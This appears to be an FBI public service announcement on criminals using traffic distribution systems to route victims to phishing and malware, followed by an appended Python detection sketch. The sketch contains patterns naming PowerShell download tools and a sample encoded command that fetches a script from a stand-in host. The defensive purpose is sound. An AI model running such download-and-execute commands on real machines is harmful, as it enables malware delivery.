IC3.gov News

Internet Crime Complaint Center (IC3)
2026-06-18 · via IC3.gov News

The Federal Bureau of Investigation (FBI) is publishing this Public Service Announcement (PSA) to warn the public of cyber criminal use of traffic distribution systems (TDSs) to gain access to victim networks for ransomware or other financial scams. A TDS is a technology used to route internet visitors to different destinations after they visit webpages, click advertisement links, sign up for promotions and discounts, or download an application. Cyber criminals use TDSs to selectively redirect users to compromised or fake login websites that can host phishing pages for online financial fraud or prompt users to download software updates containing malware.

How a Malicious Traffic Distribution System Works

  1. Initiation of Redirection: Cyber criminals use a variety of methods to drive users to a TDS, including social engineering techniques, such as links included in phishing emails, search engine optimization poisoning that promotes fraudulent advertisement links that mimic legitimate ones, or the compromise of legitimate websites through changes to the website code.

    1. Legitimate websites are vulnerable to cyber criminal compromise when using insecure passwords or outdated website themes and plugins. Cyber criminals obtain unauthorized access to websites by brute forcing weak administrative passwords or leveraging exploits for outdated website plugins. After obtaining administrative access to legitimate websites, cyber criminals edit the website’s code, which redirects website visitors to a malicious TDS.
  2. Redirection Bypasses Firewall: Cyber criminals often use TDS to bypass traditional firewall rules that would otherwise block connections to malicious websites. The TDS uses a complex chain of intermediate nodes to hide the final malicious destination, making it difficult to trace and block.
  3. Filtering Website Visitors: Cyber criminals use TDS to analyze potential victims to target by collecting their IP address, operating system, location, device, and browser information. Based on the collected information, a malicious TDS can determine if a payload is effective and filter traffic accordingly. A cyber criminal can use a TDS to identify users in regions they are not targeting, allowing them to avoid detection by displaying safe content to undesired targets, including security researchers.
  4. Cyber Criminal Exploitation of Users: Cyber criminals can exploit website visitor devices at the end of the TDS redirection chain by delivering phishing pages, financial scams, and other malware. Cyber criminals sometimes use a TDS to gain access to a victim’s network, often through malware distribution. Access to victim accounts obtained via network access may be sold for a fee to other cyber criminals, including ransomware groups.

Tips to Protect Yourself

The FBI recommends individuals take the following precautions to protect themselves from being targeted by a malicious TDS:

  • Exercise Caution When Clicking on Advertisements: Before clicking on an advertisement, check the URL to make sure the site is authentic. A malicious URL may be similar to a legitimate URL or a subdomain of a legitimate domain.
  • Keep Software Updated: Regularly update website software plugins and themes to patch known vulnerabilities. Enable automatic updates for minor releases and plugins.
  • Use Security Plugins & Firewalls: Install reputable plugins that provide a Web Application Firewall (WAF) to block malicious traffic.
  • Harden Login Security: Enforce strong passwords for all users, implement Two-Factor Authentication (2FA), and limit login attempts to prevent brute-force attacks.
  • Avoid Unverified Developers: Only install third-party plugins and themes from reputable, verified developers and official repositories.

The FBI recommends businesses take the following precautions to protect themselves from malicious TDS:

  • Change Default File Associations: Consider changing the default file associations for js files so users cannot execute malicious js payloads delivered through malicious TDS.
  • Monitor Endpoints: Monitor endpoints for suspicious execution of wscript.exe, cscript.exe and PowerShell scripts invoking web requests for suspicious files, specifically js, ps1, or svg files.
  • User Training and Awareness: Combat phishing and social engineering tactics through user training and awareness.
  • Audit and Patch Web Hosting Administration: Frequently audit Content Management System (CMS) admin, database, File Transfer Protocol (FTP) and web hosting accounts, and use strong, unique passwords. Patch all CMS and third-party components.
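
The endpoint-monitoring tip above, sketched as detection logic over process-creation events. This is an added example, not part of the FBI announcement; the event field names (`image`, `command_line`), the web-request and user-writable-path pattern lists, and the sample events are assumptions constructed for illustration. It goes slightly beyond the text by also decoding PowerShell `-EncodedCommand` arguments before matching.

```python
import base64
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Ways a PowerShell command line issues a web request (assumed, not exhaustive).
WEB_REQUEST = re.compile(r"invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b|\bcurl\b"
                         r"|\bwget\b|downloadstring|downloadfile|start-bitstransfer", re.I)
# js, ps1 or svg file reference; the lookahead keeps ".json" from matching ".js".
SUSPECT_FILE = re.compile(r"\.(?:js|ps1|svg)(?=[\"'\s?#)]|$)", re.I)
# User-writable folders where a downloaded script usually lands (assumption).
USER_PATHS = re.compile(r"\\(?:downloads|appdata|temp)\\", re.I)
# Approximate match for -EncodedCommand and its common abbreviations.
ENCODED = re.compile(r"(?<![\w-])-(?:e|ec|en|enc[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)

def expand_encoded(cmd):
    """Append the decoded -EncodedCommand payload so the patterns can see it."""
    m = ENCODED.search(cmd)
    if not m:
        return cmd
    try:
        return cmd + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmd

def classify(event):
    """Return a reason string for a matching process-creation event, else None."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = expand_encoded(event["command_line"])
    if image in SCRIPT_HOSTS and SUSPECT_FILE.search(cmd) and USER_PATHS.search(cmd):
        return "script host running js/ps1/svg from user-writable path"
    if image in POWERSHELL and WEB_REQUEST.search(cmd) and SUSPECT_FILE.search(cmd):
        return "PowerShell web request for js/ps1/svg file"
    return None

# Constructed sample events (hosts, users and paths are made up for this example).
_ENC = base64.b64encode(
    "iwr http://cdn.example/update.js -OutFile u.js".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'wscript.exe "C:\Users\alice\Downloads\Chrome_Update.js"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -enc " + _ENC},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -c Invoke-WebRequest https://intranet.example/status.json"},
    {"image": r"C:\Windows\System32\cscript.exe",
     "command_line": r"cscript.exe //nologo C:\Windows\System32\slmgr.vbs /dli"},
]
```

In practice the events would come from process-creation telemetry such as Windows Security event 4688 or Sysmon event 1, mapped onto the two assumed fields.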

Report It

If you believe you have been the victim of an intrusion into your website similar to that described above, in addition to filing police reports with your local police department, file a complaint with the Internet Crime Complaint Center (IC3) at www.ic3.gov, or by contacting your local FBI Field Office.